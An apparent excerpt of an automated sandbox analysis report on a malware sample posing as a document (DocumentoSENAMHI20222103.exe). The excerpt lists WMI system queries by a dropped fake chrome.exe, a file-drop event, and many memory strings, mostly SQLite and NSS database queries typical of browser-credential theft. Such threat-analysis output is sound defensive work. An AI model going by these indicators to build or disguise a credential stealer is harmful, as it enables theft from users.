                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exe
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD14A2 CoCreateInstance,1_2_00BD14A2
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 